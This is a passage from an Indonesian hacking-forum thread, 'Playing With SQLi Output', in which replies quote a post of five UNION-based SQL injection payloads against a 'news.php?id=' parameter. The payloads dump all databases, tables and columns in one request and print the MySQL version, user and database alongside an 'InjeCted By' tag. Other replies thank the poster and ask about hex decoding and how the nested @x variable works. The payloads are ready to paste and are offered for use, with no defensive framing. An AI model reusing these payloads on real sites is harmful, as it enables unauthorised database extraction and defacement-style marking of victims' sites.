[Share] Playing With SQLi Output
#11
(04-18-2014, 08:27 PM)iKONspirasi Wrote:
(04-18-2014, 08:17 PM)wine trochanter Wrote:
(04-18-2014, 08:08 PM)iKONspirasi Wrote: wooo itu hex toh Big Grin
sep tks udah dijelaskan bro #joss

pake tools atau apa nih buat ngerubah hex ke normal? biasanya gw pake ini:
/tools/xlate/

saya pake hackbar aja om
trit nya ada disni
/forum/thread-5705.html

wokee bro, tks infonya Big Grin

hihi sami2 pak :* Smile)
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#12
hasil yang keluarnya sih ngerti Big Grin .. cuma logika kode

"(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x)"

yang ane kgk ngerti om :v selectnya nyampe 3x trus pake @x itu apa :3 @wine trochanter

#13
(04-12-2014, 12:58 PM)wine trochanter Wrote: Assalamualaikum, numpang share Big Grin

#PART 1
Menampilkan semua table dalam database

target/v2/news.php?id=90' div 0 UniOn SeleCt 1,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),3,4,5,6-- -
Spoiler! :


#PART 2
Menampilkan seluruh database, table dan column dalam satu perintah

target/v2/news.php?id=90' div 0 UniOn SeleCt 1,(SELECT(@x)from(SELECT(@x:=0x00),(SELECT(0)from(information_schema.columns)where(table_schema!=0x64617461626173652829)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2f,table_name,0x2f,column_name))))x),3,4,5,6-- -
Spoiler! :


#PART 3
Menampilkan semua table dengan memberi nomor urutan

target/news.php?id=90' div 0 UniOn SeleCt 1,(select (@x) from (select (@x:=0x00), (@running_number:=0),(select (0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,@running_number:=@running_number+1,0x2e20,table_name))))x),3,4,5,6-- -
Spoiler! :


#PART 4
Menampilkan versi mysql dan nama kita menggunakan tag dengan html

target/news.php?id=90' div 0 UniOn SeleCt 1,concat('<b><font color=green size=4><center>InjeCted By wine<br><font color=blue>MySql Version :: <font color=red>',@@version),3,4,5,6-- -
Spoiler! :


#PART 5
Menampilkan dan membuat table

/news.php?id=90' div 0 UniOn SeleCt 1,concat(0x3c666f6e7420666163653d636f75726965722073697a653d333e696e6a65637465642062792077696e653e3e20,version(),0x3c7461626c6520626f726465723d313e3c74723e3c74643e557365723c2f74643e3c74643e,user(),0x3c2f74643e3c2f74723e3c74723e3c74643e44617461626173653c2f74643e3c74643e,database(),0x3c2f74643e3c2f74723e3c2f7461626c653e),3,4,5,6-- -
Spoiler! :


Okay sampai disini dulu, semoga bermanfaat. See u next time
thx to G_26 and Ajkaro \m/\m/\m/

Mantap Dah :-bd
Dump In One Shot ciattt Smile:-

#14
(04-12-2014, 12:58 PM)wine trochanter Wrote: Assalamualaikum, numpang share Big Grin

#PART 1
Menampilkan semua table dalam database

target/v2/news.php?id=90' div 0 UniOn SeleCt 1,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),3,4,5,6-- -
Spoiler! :


#PART 2
Menampilkan seluruh database, table dan column dalam satu perintah

target/v2/news.php?id=90' div 0 UniOn SeleCt 1,(SELECT(@x)from(SELECT(@x:=0x00),(SELECT(0)from(information_schema.columns)where(table_schema!=0x64617461626173652829)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2f,table_name,0x2f,column_name))))x),3,4,5,6-- -
Spoiler! :


#PART 3
Menampilkan semua table dengan memberi nomor urutan

target/news.php?id=90' div 0 UniOn SeleCt 1,(select (@x) from (select (@x:=0x00), (@running_number:=0),(select (0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,@running_number:=@running_number+1,0x2e20,table_name))))x),3,4,5,6-- -
Spoiler! :


#PART 4
Menampilkan versi mysql dan nama kita menggunakan tag dengan html

target/news.php?id=90' div 0 UniOn SeleCt 1,concat('<b><font color=green size=4><center>InjeCted By wine<br><font color=blue>MySql Version :: <font color=red>',@@version),3,4,5,6-- -
Spoiler! :


#PART 5
Menampilkan dan membuat table

/news.php?id=90' div 0 UniOn SeleCt 1,concat(0x3c666f6e7420666163653d636f75726965722073697a653d333e696e6a65637465642062792077696e653e3e20,version(),0x3c7461626c6520626f726465723d313e3c74723e3c74643e557365723c2f74643e3c74643e,user(),0x3c2f74643e3c2f74723e3c74723e3c74643e44617461626173653c2f74643e3c74643e,database(),0x3c2f74643e3c2f74723e3c2f7461626c653e),3,4,5,6-- -
Spoiler! :


Okay sampai disini dulu, semoga bermanfaat. See u next time
thx to G_26 and Ajkaro \m/\m/\m/

kurang begitu ngerti tentang sql tapi nice lah buat pembelajaran hehe makasih ilmunya bro....






Users browsing this thread: 1 Guest(s)